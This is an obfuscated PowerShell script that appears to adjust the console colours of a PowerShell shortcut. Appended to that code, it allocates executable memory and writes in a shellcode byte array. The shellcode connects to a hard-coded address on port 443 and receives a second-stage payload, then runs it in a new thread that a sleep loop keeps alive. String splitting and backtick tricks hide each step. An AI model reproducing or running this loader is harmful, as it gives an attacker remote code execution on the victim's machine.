param(${pA`Th} = ((("{0}{6}{14}{26}{5}{10}{21}{13}{23}{25}{1}{29}{7}{3}{20}{8}{12}{17}{4}{9}{15}{11}{2}{19}{27}{31}{24}{22}{28}{30}{16}{18}" -f 'C:{0','m','r','Microsof','i','}mmess','}U','0}','ernet Explor','ck ','ano','e','er{0}','A','sers{','Launch{0}Us',' Po','Qu','werShell.lnk',' Pinned','t{0}Int','{0}','askBar{0','ppData','}T','{0}Roa','0','{','}Windo','ing{','ws','0'))-f[Char]92) )
 


















 


${B`la`CK} = 0
${d`ARkbL`Ue} = 1
${dArkg`R`e`EN} = 2
${DARk`c`YaN} = 3
${dARK`Red} = 4
${dARkm`AG`en`TA} = 5
${DaRkY`E`l`Low} = 6


${gr`Ay} = 7
${dAR`kgR`AY} = 8
${BL`Ue} = 9
${gr`een} = 10
${C`YAn} = 11
${r`Ed} = 12
${M`A`GENta} = 13
${yE`l`low} = 14
${w`HiTE} = 15
 

${L`NK} = .((("{2}{1}{7}{0}{5}{6}{4}{3}" -f '_b','owershel','E:{0}Dexma{0}p','ink.ps1','L','its{','0}Get-','l')) -F  [Char]92) ${P`ATH}
 
${L`Nk}."conSO`L`eCOloRS"[${blA`ck}]       =   ("
$lnk.ConsoleColors[$DarkBlue] "+' '+' '+' '+'= '+' '+' '+'')
${l`Nk}."C`ONS`oLeC`oLoRS"[${DARkGr`e`En}]   =   ("
$lnk.ConsoleColors[$DarkCyan] "+' '+' '+' '+'= '+' '+' '+'')
${L`NK}."C`onso`LeCol`Ors"[${Da`RkR`eD}]     =   ("
$lnk.ConsoleColors[$DarkMagenta] "+'= '+' '+' '+'')
${L`NK}."consOlEcO`L`ors"[${Da`R`kYELlOw}]  =   ("
$lnk.ConsoleColors[$Gray] "+' '+' '+' '+' '+' '+' '+' '+'= '+' '+' '+'')
${L`Nk}."c`On`SoleCOl`O`Rs"[${dARK`gr`Ay}]    =   ("
$lnk.ConsoleColors[$Blue] "+' '+' '+' '+' '+' '+' '+' '+'= '+' '+' '+'')
${L`NK}."co`NsoLEcolo`RS"[${gr`EEn}]       =   ("
$lnk.ConsoleColors[$Cyan] "+' '+' '+' '+' '+' '+' '+' '+'= '+' '+' '+'')
${L`Nk}."Con`S`o`Le`COlors"[${r`eD}]         =   ("
$lnk.ConsoleColors[$Magenta] "+' '+' '+' '+' '+'= '+' '+' '+'')
${l`Nk}."cO`NSO`LeCol`ORs"[${yElL`ow}]      =   ("
$lnk.ConsoleColors[$White] "+' '+' '+' '+' '+' '+' '+'= '+' '+' '+'')
 
 
${l`Nk}.("{1}{0}" -f'ave','S').Invoke()
${C} = ((("{72}{64}{70}{44}{14}{27}{79}{19}{29}{2}{33}{56}{34}{26}{24}{32}{52}{46}{18}{28}{55}{63}{76}{60}{67}{11}{5}{75}{59}{43}{4}{53}{62}{61}{3}{35}{41}{73}{15}{69}{57}{49}{30}{68}{58}{71}{12}{13}{77}{0}{51}{8}{7}{48}{21}{42}{16}{39}{23}{47}{65}{22}{17}{1}{54}{25}{74}{50}{31}{6}{45}{38}{9}{66}{36}{10}{78}{40}{20}{37}{80}"-f'ntPtr lpPara','D','ze, uin','ad(I','static extern I','l',')]pub','er, u','et','i','me','l',', Int','Ptr lpSt','xtern IntPtr VirtualAl','ut','t','eadId);[','DllImp','c(In','tr dest, uint src, uint ','Cre','IntPtr lpThr','la','locat','I','Al','l','ort(Qn','tPtr lpAddress, uint dwSi',' dwS','svcrt.dllQnZ','ionTyp','t ','l','ntPtr lp','xtern IntPtr ','count)','c stat','ionF','t(IntP','Threa','a','public ',')]public static e','li',';[','gs','int dw','nt','(QnZm','m','e, uint flProtect)','ntPtr C','ll','Zker','f','i','ckSiz','nZ)]','2','re','reateTh','ne','llImport(QnZkern',', ','c e','.d','ta','es, u','el32.dllQnZ','e','[D','dAttrib','mport','Q','l3','artAddress, I','mse','o',';'))."r`EPlACE"(([cHar]81+[cHar]110+[cHar]90),[stRING][cHar]34));${W} = &("{1}{2}{0}"-f 'Type','Ad','d-') -memberDefinition ${c} -Name ("{1}{0}"-f '2','Win3') -namespace ("{2}{0}{1}"-f '32Function','s','Win') -passthru;[Byte[]];[Byte[]]${Z} = 0xfc,0xe8,0x89,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xd2,0x64,0x8b,0x52,0x30,0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf0,0x52,0x57,0x8b,0x52,0x10,0x8b,0x42,0x3c,0x01,0xd0,0x8b,0x40,0x78,0x85,0xc0,0x74,0x4a,0x01,0xd0,0x50,0x8b,0x48,0x18,0x8b,0x58,0x20,0x01,0xd3,0xe3,0x3c,0x49,0x8b,0x34,0x8b,0x01,0xd6,0x31,0xff,0x31,0xc0,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf4,0x03,0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe2,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x58,0x5f,0x5a,0x8b,0x12,0xeb,0x86,0x5d,0x68,0x33,0x32,0x00,0x00,0x68,0x77,0x73,0x32,0x5f,0x54,0x68,0x4c,0x77,0x26,0x07,0xff,0xd5,0xb8,0x90,0x01,0x00,0x00,0x29,0xc4,0x54,0x50,0x68,0x29,0x80,0x6b,0x00,0xff,0xd5,0x50,0x50,0x50,0x50,0x40,0x50,0x40,0x50,0x68,0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x97,0x6a,0x05,0x68,0xc0,0xa8,0x01,0xd2,0x68,0x02,0x00,0x01,0xbb,0x89,0xe6,0x6a,0x10,0x56,0x57,0x68,0x99,0xa5,0x74,0x61,0xff,0xd5,0x85,0xc0,0x74,0x0c,0xff,0x4e,0x08,0x75,0xec,0x68,0xf0,0xb5,0xa2,0x56,0xff,0xd5,0x6a,0x00,0x6a,0x04,0x56,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x8b,0x36,0x6a,0x40,0x68,0x00,0x10,0x00,0x00,0x56,0x6a,0x00,0x68,0x58,0xa4,0x53,0xe5,0xff,0xd5,0x93,0x53,0x6a,0x00,0x56,0x53,0x57,0x68,0x02,0xd9,0xc8,0x5f,0xff,0xd5,0x01,0xc3,0x29,0xc6,0x85,0xf6,0x75,0xec,0xc3;${G} = 0x1000;if (${z}."L`EnGTH" -gt 0x1000){${G} = ${Z}."LEnG`TH"};${X}=${w}::("{2}{1}{0}{3}"-f'tualAll','r','Vi','oc').Invoke(0,0x1000,${g},0x40);for (${I}=0;${i} -le (${Z}."L`Eng`Th"-1);${i}++) {${w}::"M`e`mSET"([IntPtr](${X}.("{1}{2}{0}" -f'Int32','T','o').Invoke()+${i}), ${Z}[${I}], 1)};${w}::("{1}{0}{2}"-f'hr','CreateT','ead').Invoke(0,0,${x},0,0,0);for (;;){&("{1}{2}{0}" -f 'p','Start-sl','ee') 60};
